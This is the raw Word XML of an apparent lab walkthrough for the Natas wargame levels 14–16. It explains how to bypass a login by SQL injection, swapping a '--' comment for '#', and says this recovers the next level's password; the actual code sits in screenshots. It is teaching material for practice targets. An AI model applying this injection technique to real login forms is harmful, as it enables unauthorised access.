        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2693F8B0" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="72F2AA15" wp14:editId="6273E3EF">
            <wp:extent cx="5943600" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276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5943600" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B83E00" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="582F331B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CTRL+H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0xa0&gt; in the find bar and then hit the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">replace all </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The end result</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should clean up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C879FD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="16FC96F6" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="12FC2EDB" wp14:editId="6F9E31AA">
            <wp:extent cx="5738813" cy="2106071"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276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5738813" cy="2106071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="733809BF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="47DACEEF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="30418C0E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">This is much easier to read. However, we can make it even better by changing the syntax to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. This will allow us to better see the color codes which help when looking for errors. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA6B7C5" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="5FE4F3BB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+SHIFT+P </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">syntax </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D672DBD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="2A529F93" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="22E44A1C" wp14:editId="2AFBD7AF">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276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5943600" cy="1206500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC0A43E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="7F69B031" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1A8E214E" wp14:editId="59A060CF">
            <wp:extent cx="5943600" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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943600" cy="2222500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499478E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="575AE0E3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">It looks to be a MySQL database that is not sanitized. This will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>definitely be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a SQL injection vulnerability. The screenshot below shows the major vulnerability here. Let’s use the same exploit we used in Module 7, Lesson 1 with a few minor modifications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472372F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="3CBBF44B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="78AEDD3B" wp14:editId="676A202F">
            <wp:extent cx="5943600" cy="1193800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="277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5943600" cy="1193800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197C282" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="060D9FDD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at the screenshots below and modify your Python reque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>st in the natas14-15 tab to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> match the parameters. The username and password can be anything as we are bypassing this using the SQL query. Note, the screenshot is split in two for legibility. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BAA252" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="39F2171B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6D619FBC" wp14:editId="5539E861">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="277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5943600" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D2F31" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="52B8301C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2994BF76" wp14:editId="4A81CCC3">
            <wp:extent cx="5610225" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="277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5610225" cy="514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A7CAF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362E2F99" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the output and change the build output syntax the html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4DB52" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABEB15A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="709925D6" wp14:editId="3E4D6A25">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6BE5D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="17E1A238" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">It appears that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not commenting out the SQL query after our injection. We can use other techniques to comment out the query. We can use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. We have done this many times in Python. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46190D2B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="4A1B1342" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>, save the file and build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-185" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9535"/>
      </w:tblGrid>
      <w:tr w:rsidR="00224E99" w14:paraId="1A61817B" w14:textId="77777777" w:rsidTr="00224E99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F2E32D9" w14:textId="19B00D0B" w:rsidR="00224E99" w:rsidRDefault="00224E99" w:rsidP="00224E99">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F10C2E" wp14:editId="6D6E193C">
                  <wp:extent cx="5943600" cy="3213100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635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213100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D1A7E30" w14:textId="77777777" w:rsidR="00224E99" w:rsidRDefault="00224E99" w:rsidP="00224E99">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBEAB0A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB44CDD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3AEDDA65" wp14:editId="51E01D12">
            <wp:extent cx="5943600" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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943600" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF596E6" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1DC82737" wp14:editId="22951D22">
            <wp:extent cx="5229225" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5229225" cy="790575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AABC83" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0EC7F4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>This worked! Now we have the password for natas15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19B7BA" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAA3D7A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 15-16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05422B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="2DC84516" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">As completed in previous tasks, we want to change the Python code to match our new parameters. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F322F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="1D052312" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at the screenshot below to check if you have all the parameters correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F35E4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Save the file as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>natas15-16.py</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D634930" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9265"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F13ACA" w14:paraId="5E62B167" w14:textId="77777777" w:rsidTr="00F13ACA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9265" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19654DB4" w14:textId="32BB6157" w:rsidR="00F13ACA" w:rsidRDefault="00F13ACA" w:rsidP="00F13ACA">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59922829" wp14:editId="5E082349">
                  <wp:extent cx="5943600" cy="3213100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635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213100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08245F65" w14:textId="77777777" w:rsidR="00F13ACA" w:rsidRDefault="00F13ACA" w:rsidP="00F13ACA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FB9CB8" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B7F013" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4D8B6503" wp14:editId="77AEFEC0">
            <wp:extent cx="5943600" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5943600" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C958" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="1815F08A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0F7003B7" wp14:editId="574B2F9D">
            <wp:extent cx="5934075" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="274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5934075" cy="1076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9A11F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="1866E493" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>The response shows that we have a form that only checks to see if a user exists. Let’s look at the source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5BABBA" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="5DD7CD9E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the natas15-16 tab, append the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index-source.html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF81871" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-185" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9535"/>
      </w:tblGrid>
      <w:tr w:rsidR="00016888" w14:paraId="7BC34654" w14:textId="77777777" w:rsidTr="00B670F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B022145" w14:textId="6283BCB2" w:rsidR="00016888" w:rsidRDefault="00B670F6" w:rsidP="00016888">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72EAD6B2" wp14:editId="529B1E3B">
                  <wp:extent cx="5943600" cy="3199765"/>
                  <wp:effectExtent l="0" t="0" r="0" b="63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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D3731EF" w14:textId="77777777" w:rsidR="00016888" w:rsidRDefault="00016888" w:rsidP="00016888">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACE6C0F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C146074" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, this is hard to read, so we will use HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Deentitize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, delete all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
